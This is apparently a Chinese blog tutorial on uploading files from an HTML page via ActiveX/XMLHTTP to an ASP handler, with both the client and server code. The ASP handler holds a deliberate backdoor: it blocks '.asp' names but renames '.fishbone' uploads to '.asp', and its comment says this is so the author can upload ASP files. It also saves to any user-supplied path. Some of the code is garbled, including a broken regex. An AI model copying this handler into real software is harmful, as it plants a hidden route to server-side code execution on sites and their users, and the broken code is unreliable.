html上传文件的实例

html页面代码

 

<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
上传文件
<INPUT TYPE="file" NAME="" id="a"><br>
存放路径
<INPUT TYPE="text" NAME="" id="b" onclick="showpath()">需写上文件名<BR>
<input type=button onclick='upload($("a").value,$("b").value)' value=上传><br>
<span id="spath"></span><br>
<span id="nowurl"></span>
<STYLE TYPE="text/css" TITLE="">
.tfont
{font-size:12px}
</STYLE> 


<SCRIPT LANGUAGE="JavaScript">
<!--
function showpath(){
    
var path=new Ajax();
    
var d=function(o){
    $(
"spath").innerHTML=o.responseText;};
    
var w=function(){};
    path.open(
"http://10.84.50.220/WebService1/uploadfile.asp","post",d,w);
}
function overit(){
event.srcElement.style.cursor
="hand";
event.srcElement.style.background
="#EECC99";
}
function outit(){
event.srcElement.style.background
="transparent";
}
function s(){
event.srcElement.parentNode.style.display
="none";
$(
"b").focus();
$(
'b').value=event.srcElement.innerHTML;
}
function upload(surl,turl){
    surl
=surl.replace(///g,"//");
    
var read=new xmlhttp();
    
var read2=new xmlhttp();
    
var xml_dom = new ActiveXObject("MSXML2.DOMDocument");
    xml_dom.loadXML(
'<?xml version="1.0" ?> <root/>');
    xml_dom.documentElement.setAttribute(
"xmlns:dt""urn:schemas-microsoft-com:datatypes");
    
var l_node1 = xml_dom.createElement("file1");
    
var fname = xml_dom.createElement("name");
    l_node1.dataType 
= "bin.base64";
    read.open(
"get",surl,true);
    read.onreadystatechange
=p;
    read.send(
null);
        
function p(){
            
if (read.readystate==4)
            {
                fname.nodeTypedValue
=turl;
                l_node1.nodeTypedValue 
=read.responseBody;
                xml_dom.documentElement.appendChild(l_node1);
                xml_dom.documentElement.appendChild(fname);
                read2.open(
"POST","http://10.84.50.220/WebService1/uploadfile.asp",true);
                
try{read2.setRequestHeader("Content-Type","text/xml");}catch(e){
                
try{read2.overrideMimeType('text/xml');}catch(e){}
            }
        read2.onreadystatechange
=function(){
            
if(read2.readystate==4&&read2.status==200){
                $(
"nowurl").innerHTML="<a href=http://www.cnjpzs.com/fishbone/"+turl+">now url</a>";
            }
                
else{$("nowurl").innerHTML="上传中……"+read2.readystate;}
            }
        read2.send(xml_dom);
        }
    }
}
//xmlhttprequest对象
function xmlhttp(){
var xmlhttp = false;//以下写法为JS条件编译写法
/*
@cc_on
   @if (@_jscript_version >= 5)
      try {
      xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
      }
      catch (e){
         try {
         xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
         }
         catch (e2){
         xmlhttp = false
         }
      }
   @end
@
*/
if (!xmlhttp && typeof XMLHttpRequest != 'undefined')
    {xmlhttp 
= new XMLHttpRequest()}
return xmlhttp;
}
/*Ajax核心,兼容IE以及FF的XMLHttpRequest对象*/
function Ajax(){
    
var xmlhttp = false,isComplete = false;//以下写法为JS条件编译写法
    /*@cc_on
       @if (@_jscript_version >= 5)
          try {
          xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
          }
          catch (e){
             try {
             xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
             }
             catch (e2){
             xmlhttp = false
             }
          }
       @end
    @
*/
    
if (!xmlhttp && typeof XMLHttpRequest != 'undefined')
        {xmlhttp 
= new XMLHttpRequest()}
     
this.open = function(url, method, feedback,process, arg)
      {
        
if (!xmlhttp) return false;
        isComplete 
= false;
        method 
= method.toUpperCase();
    
        
try {
          
if (method == "GET")
          {
            xmlhttp.open(method, url
+"?"+arg, true);
            arg 
= null;
          }
          
else
          {
            xmlhttp.open(method, url, 
true);
            xmlhttp.setRequestHeader(
"Method""POST "+url+" HTTP/1.1");
            xmlhttp.setRequestHeader(
"Content-Type","application/x-www-form-urlencoded");
            xmlhttp.setRequestHeader(
"Connection","close");
          }
          xmlhttp.onreadystatechange 
= function(){
            
if (xmlhttp.readyState == 4 && !isComplete)
            {
              isComplete 
= true;
              
if(xmlhttp.status==200){
                  feedback(xmlhttp);}
                  
else{feedback(xmlhttp.status)}
              }
              
else
              {process(xmlhttp.readyState);}
              
              };
          xmlhttp.send(arg);
        }
        
catch(z) { return false; }
        
return true;
      };
      
return this;
};
//=================
//
-->
</SCRIPT>

 对应的服务器上传文件:

 

<%@ language=vbscript codepage=65001%>
<%
dim ado_stream
dim xml_dom
dim xml_file1
Dim str
On Error Resume next
set ado_stream = Server.CreateObject("ADODB.Stream")
Set xml_dom = Server.CreateObject("Microsoft.XMLDOM")
xml_dom.load(request)
set xml_file1 = xml_dom.selectSingleNode("root/file1")
Set xml_name=xml_dom.selectSingleNode("root/name")
Set reg=new RegExp
reg.pattern
=".asp"
str
=xml_name.nodeTypedValue
str
=Replace(str,".asp",".txt")'将上传的asp文件重命名,防止别人上传asp文件
str=Replace(str,".fishbone",".asp")'如果name的后缀名为fishbone,则更名成asp文件,给自己上传asp文件留后门
ado_stream.Type = 1 
ado_stream.open 
ado_stream.write xml_file1.nodeTypedValue
ado_stream.SaveToFile server.mappath(
".")&""&str,2 ' 2=adSaveCreateOverWrite 
ado_stream.close
set ado_stream = Nothing 
set xml_dom = Nothing
If Err.number<>0 Then response.write Err.description
Response.Write 
"Upload successful!"
%
>
阅读更多
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭
关闭